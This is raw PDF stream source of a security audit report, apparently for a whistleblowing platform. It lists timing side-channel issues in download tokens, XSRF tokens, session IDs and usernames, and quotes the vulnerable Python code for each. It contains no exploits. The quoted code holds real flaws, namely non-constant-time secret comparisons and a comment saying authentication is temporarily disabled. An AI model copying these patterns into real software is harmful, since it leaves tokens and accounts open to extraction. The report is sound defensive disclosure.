BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .114751 Tw (The file download token is used as a key in the database to find the file to download. An attacker might be) Tj T* 0 Tw (able to measure the amount of time this takes to extract a valid file download token.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 464.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 108 re B*
Q
q
BT 1 0 0 1 0 86 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (download_file) Tj 0 0 0 rg (\() Tj (store) Tj (,) Tj ( ) Tj (file_id) Tj (\):) Tj  T* (    ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* (    Auth temporary disabled, just Tip_id and File_id required) Tj T* (    """) Tj /F3 10 Tf 0 0 0 rg  T*  T* (    ) Tj (rfile) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (ReceiverFile) Tj (,) Tj  T* (                       ) Tj (ReceiverFile) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (file_id) Tj (\)\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj  T* (    ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# ...) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 444.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 426.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 408.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 408.8236 cm
Q
 
endstream
endobj
% 'R369': class PDFStream 
369 0 obj
% page stream
<< /Length 3655 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.2: Timing Leak of Collection Download Token) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Collection download tokens may be leaked via the timing side-channel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 696.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to download submitted files.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
BT 1 0 0 1 0 14 Tm .289987 Tw 12 TL /F1 10 Tf 0 0 0 rg (The collection download token is checked by looking it up in a ) Tj /F3 10 Tf (dict ) Tj /F1 10 Tf (hash table. The time taken depends) Tj T* 0 Tw (on what's already in the table. An attacker may be able to use this to extract a collection download ID.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 490.8262 cm
q
q
.976496 0 0 .976496 0 0 cm
q
1 0 0 1 6.6 6.758862 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 480 84 re B*
Q
q
BT 1 0 0 1 0 62 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj (temporary_download_id) Tj (\):) Tj  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (temporary_download_id) Tj ( ) Tj /F6 10 Tf .666667 .133333 1 rg (in) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj (:) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj (temporary_download_id) Tj (]) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_type) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('rtip') Tj 0 0 0 rg (:) Tj  T* (            ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj (temporary_download_id) Tj (]) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_val) Tj  T*  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 470.8262 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 452.8262 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 434.8262 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 434.8262 cm
Q
 
endstream
endobj
% 'R370': class PDFStream 
370 0 obj
% page stream
<< /Length 4139 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.3: Timing Leak of XSRF Token) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The XSRF token can leak via the timing side-channel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 696.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (A cross-domain timing attack could be used to learn the user's XSRF token.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.439398 Tw 12 TL /F1 10 Tf 0 0 0 rg (The XSRF token is checked with the ) Tj /F3 10 Tf (!= ) Tj /F1 10 Tf (operator, whose execution time varies with the length of the) Tj T* 0 Tw (common prefix of the two strings.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 452.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 120 re B*
Q
q
BT 1 0 0 1 0 98 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (check_xsrf_cookie) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (\):) Tj  T* (    ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* (        Override needed to change name of header name) Tj T* (    """) Tj /F3 10 Tf 0 0 0 rg  T* (    ) Tj (token) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (headers) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (get) Tj (\() Tj .729412 .129412 .129412 rg ("X-XSRF-TOKEN") Tj 0 0 0 rg (\)) Tj  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .666667 .133333 1 rg (not) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (token) Tj (:) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (raise) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (HTTPError) Tj (\() Tj .4 .4 .4 rg (403) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ("X-XSRF-TOKEN argument missing from POST") Tj 0 0 0 rg (\)) Tj  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (xsrf_token) Tj ( ) Tj .4 .4 .4 rg (!=) Tj 0 0 0 rg ( ) Tj (token) Tj (:) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (raise) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (HTTPError) Tj (\() Tj .4 .4 .4 rg (403) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ("XSRF cookie does not match POST argument") Tj 0 0 0 rg (\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 432.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 414.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 396.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Replace the comparison with ) Tj /F3 10 Tf (constant_time_compare ) Tj /F1 10 Tf (or equivalent \(see ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (\).) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 378.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists, assuming this code gets called.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 378.8236 cm
Q
 
endstream
endobj
% 'R371': class PDFStream 
371 0 obj
% page stream
<< /Length 4081 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.4: Timing Leak of Session ID) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The session ID can leak via the timing side-channel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 696.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to extract a session ID.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.238735 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (A user must be logged in \(an unexpired session\) at the same time an attacker) Tj T* 0 Tw (measures response times to the attacker's requests to the Node.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.344724 Tw 12 TL /F1 10 Tf 0 0 0 rg (The session ID is validated by looking it up in a ) Tj /F3 10 Tf (dict ) Tj /F1 10 Tf (hash table. The time taken depends on what's) Tj T* 0 Tw (already in the table; an attacker might be able to exploit this to extract a valid session ID.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 392.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 180 re B*
Q
q
BT 1 0 0 1 0 158 Tm 12 TL /F3 10 Tf .666667 .133333 1 rg (@property) Tj 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (current_user) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (\):) Tj  T* (    ) Tj (session_id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg  T*  T* (    ) Tj (session_id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (headers) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (get) Tj (\() Tj .729412 .129412 .129412 rg ('X-Session') Tj 0 0 0 rg (\)) Tj  T*  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (session_id) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg (:) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg  T*  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (try) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (        ) Tj (session) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (sessions) Tj ([) Tj (session_id) Tj (]) Tj  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (except) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .823529 .254902 .227451 rg (KeyError) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (session) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 372.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 354.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 336.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 336.8236 cm
Q
 
endstream
endobj
% 'R372': class PDFStream 
372 0 obj
% page stream
<< /Length 7907 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.5: Timing Leak of Usernames) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Usernames and email addresses can leak via the timing side-channel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 684.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.356235 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to extract valid usernames. \(Note that a receiver's username is their) Tj T* 0 Tw (email address.\)) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 654.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 636.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 618.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 600.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 558.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .706488 Tw (When a user tries to log in as the Node administrator or receiver, a distinct code path is taken when the) Tj T* 0 Tw .402209 Tw (username is valid but the password is not. This causes the Node's response time to vary, which might let) Tj T* 0 Tw (an attacker confirm that an account exists, or extract a valid username.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 540.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (See the ) Tj /F3 10 Tf (Note ) Tj /F1 10 Tf (comments added to the code below:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 267.0277 cm
q
q
.758866 0 0 .758866 0 0 cm
q
1 0 0 1 6.6 8.697189 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 618 348 re B*
Q
q
BT 1 0 0 1 0 326 Tm 12 TL /F3 10 Tf .666667 .133333 1 rg (@transact) Tj 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (login_receiver) Tj 0 0 0 rg (\() Tj (store) Tj (,) Tj ( ) Tj (username) Tj (,) Tj ( ) Tj (password) Tj (\):) Tj  T* (    ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# Note: Username comparison in the database query leaks information.) Tj /F3 10 Tf 0 0 0 rg  T* (    ) Tj (receiver_user) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (User) Tj (,) Tj ( ) Tj (User) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (username) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj (username) Tj (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj  T*  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .666667 .133333 1 rg (not) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (receiver_user) Tj ( ) Tj /F6 10 Tf .666667 .133333 1 rg (or) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (role) Tj ( ) Tj .4 .4 .4 rg (!=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('receiver') Tj 0 0 0 rg (:) Tj  T* (        ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# Note: This path is taken when the user doesn't exist at all.) Tj /F3 10 Tf 0 0 0 rg  T* (        ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("Receiver: Fail auth, username ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ( do not exists") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (username) Tj (\)) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (False) Tj 0 0 0 rg  T*  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .666667 .133333 1 rg (not) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (security) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (check_password) Tj (\() Tj (password) Tj (,) Tj ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (password) Tj (,) Tj ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (salt) Tj (\):) Tj  T* (        ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# Note: This path is taken when the user DOES exist, but the) Tj /F3 10 Tf 0 0 0 rg  T* (        ) Tj /F7 10 Tf .25098 .501961 .501961 rg (#       password is wrong. It does more stuff, so it probably) Tj /F3 10 Tf 0 0 0 rg  T* (        ) Tj /F7 10 Tf .25098 .501961 .501961 rg (#       takes longer to execute.) Tj /F3 10 Tf 0 0 0 rg  T* (        ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_count) Tj ( ) Tj .4 .4 .4 rg (+=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg  T* (        ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("Receiver login: Invalid password \(failed: ) Tj /F6 10 Tf .733333 .4 .533333 rg (%d) Tj /F3 10 Tf .729412 .129412 .129412 rg (\)") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_count) Tj (\)) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (username) Tj ( ) Tj /F6 10 Tf .666667 .133333 1 rg (in) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_attempts) Tj (:) Tj  T* (            ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_attempts) Tj ([) Tj (username) Tj (]) Tj ( ) Tj .4 .4 .4 rg (+=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (            ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_attempts) Tj ([) Tj (username) Tj (]) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg  T*  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (False) Tj 0 0 0 rg  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (        ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("Receiver: Authorized receiver ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (username) Tj (\)) Tj  T* (        ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (last_login) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (datetime_now) Tj (\(\)) Tj  T* (        ) Tj (receiver) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (Receiver) Tj (,) Tj ( ) Tj (\() Tj (Receiver) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (user_id) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj (\)\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj  T*  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 